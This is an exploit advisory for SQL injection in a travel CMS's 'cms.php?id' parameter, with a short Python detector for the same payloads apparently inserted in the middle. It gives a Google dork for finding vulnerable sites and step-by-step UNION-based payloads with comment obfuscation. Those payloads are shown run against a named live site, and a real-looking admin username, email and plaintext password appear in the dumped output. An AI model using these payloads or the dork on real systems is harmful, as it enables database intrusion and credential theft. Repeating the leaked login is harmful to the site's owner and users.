#################################################################################################
# Exploit Title : Powered By WorldTravelGuide HolidaySmart CMS SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 03/07/2018
# Vendor Homepages : worldtravelguide.net ~ holidaysmart.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
#################################################################################################
# Google Dork : inurl:''/cms.php?id='' site:af
# Exploit : /cms.php?id=[SQL Inj]
# SQL Injection Exploit Checked Manually [ Example Site => airgateway.af ]
Here is the SQL Inj Attack Scenario =>
127.0.0.1/cms.php?id=-6%27+/*!50000union*/+select+1,version(),3,4,5,6,7,8--%20-
Information appears on the page => 5.6.39-83.1
127.0.0.1/cms.php?id=-6%27+/*!50000union*/+select+1,/*!50000Group_Concat(table_name)*/,3,4,5,6,7,8+/*!50000from*/+information_schema.tables+where+table_schema=database()--%20-
Information appears on the page => categories,client_contact,gallery,links,misc,news,news_letter,order_products,order_reply,orders,pages,product_to_categories,products,products_images,slideshow,users
127.0.0.1/cms.php?id=-6%27+/*!50000union*/+select+1,/*!50000Group_Concat(column_name)*/,3,4,5,6,7,8+/*!50000from*/+information_schema.columns+where+table_name=0x7573657273--%20-
Information appears on the page => user_id,user_name,user_email,user_pswd,user_fname,user_address,user_phone,user_dob,user_m_status,user_kids,user_pic,user_pic_status,user_city,user_country,user_create,user_last_login,user_status,user_ac_status,total_login,user_login_status
127.0.0.1/cms.php?id=-6%27+/*!50000union*/+select+1,/*!50000Group_Concat(user_name,0x3a,user_email,0x3a,user_pswd)*/,3,4,5,6,7,8+/*!50000from*/+users--%20-
Information appears on the page [ Admin username - Admin E-Mail Address - Admin Password ] => roheenkhan:roheen@airgateway.af:j414H8J3wFc
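Detection logic for the request pattern shown above, written as an added example that is not part of the original advisory. It URL-decodes each query parameter, strips the `/*!50000...*/` MySQL version-comment obfuscation (which the server executes as plain SQL), and flags UNION / information_schema probes; the access-log request lines are constructed samples.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed request lines in access-log form (loopback, not the advisory's target).
SAMPLE_REQUESTS = [
    "GET /cms.php?id=6 HTTP/1.1",
    "GET /cms.php?id=-6%27+/*!50000union*/+select+1,version(),3,4,5,6,7,8--%20- HTTP/1.1",
    "GET /cms.php?id=-6%27+/*!50000union*/+select+1,/*!50000Group_Concat(table_name)*/,3,4,5,6,7,8"
    "+/*!50000from*/+information_schema.tables+where+table_schema=database()--%20- HTTP/1.1",
    "GET /news.php?id=12&page=2 HTTP/1.1",
]

# /*!NNNNNunion*/ is a MySQL version comment: MySQL >= N.NN.NN runs the inner text as SQL.
VERSION_COMMENT = re.compile(r"/\*!\d{5}(.*?)\*/", re.S)
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.S)
INDICATORS = [
    ("union_select", re.compile(r"\bunion\b.*\bselect\b")),
    ("information_schema", re.compile(r"\binformation_schema\.")),
    ("version_probe", re.compile(r"\bversion\s*\(")),
    ("group_concat", re.compile(r"\bgroup_concat\s*\(")),
    ("comment_terminator", re.compile(r"--\s*-?\s*$")),
]

def normalize(raw_value: str) -> str:
    """URL-decode a raw parameter value once and undo comment-based obfuscation.

    Version comments keep their payload ('/*!50000union*/' -> 'union'), ordinary
    comments are dropped, whitespace is collapsed and case is folded.
    """
    text = unquote_plus(raw_value)
    text = VERSION_COMMENT.sub(r" \1 ", text)
    text = PLAIN_COMMENT.sub(" ", text)
    return re.sub(r"\s+", " ", text).strip().lower()

def inspect_request(line: str) -> dict:
    """Map each suspicious parameter of one request line to its matched indicators."""
    parts = line.split(" ", 2)
    if len(parts) < 2:
        return {}
    findings = {}
    # Split the raw query manually so each value is decoded exactly once;
    # partition keeps '=' inside the value (e.g. table_schema=database()).
    for pair in urlsplit(parts[1]).query.split("&"):
        name, _, raw = pair.partition("=")
        hits = [label for label, rx in INDICATORS if rx.search(normalize(raw))]
        if hits:
            findings[name] = hits
    return findings

def scan(lines):
    """Return (line, findings) for every request line that carries an indicator."""
    return [(ln, f) for ln in lines for f in [inspect_request(ln)] if f]
```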
#################################################################################################
# Example Site => airgateway.af/cms.php?id=-6
# [ Proof of Concepts for SQL Inj ] =>
airgateway.af/cms.php?id=-6%27+/*!50000union*/+select+1,version(),3,4,5,6,7,8--%20-
Proof => archive.is/Pr4uO
airgateway.af/cms.php?id=-6%27+/*!50000union*/+select+1,/*!50000Group_Concat(table_name)*/,3,4,5,6,7,8+/*!50000from*/+information_schema.tables+where+table_schema=database()--%20-
Proof => archive.is/FLokd
airgateway.af/cms.php?id=-6%27+/*!50000union*/+select+1,/*!50000Group_Concat(column_name)*/,3,4,5,6,7,8+/*!50000from*/+information_schema.columns+where+table_name=0x7573657273--%20-
Proof => archive.is/8wHLE
airgateway.af/cms.php?id=-6%27+/*!50000union*/+select+1,/*!50000Group_Concat(user_name,0x3a,user_email,0x3a,user_pswd)*/,3,4,5,6,7,8+/*!50000from*/+users--%20-
Proof => archive.is/Shksx
# SQL Database Error =>
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################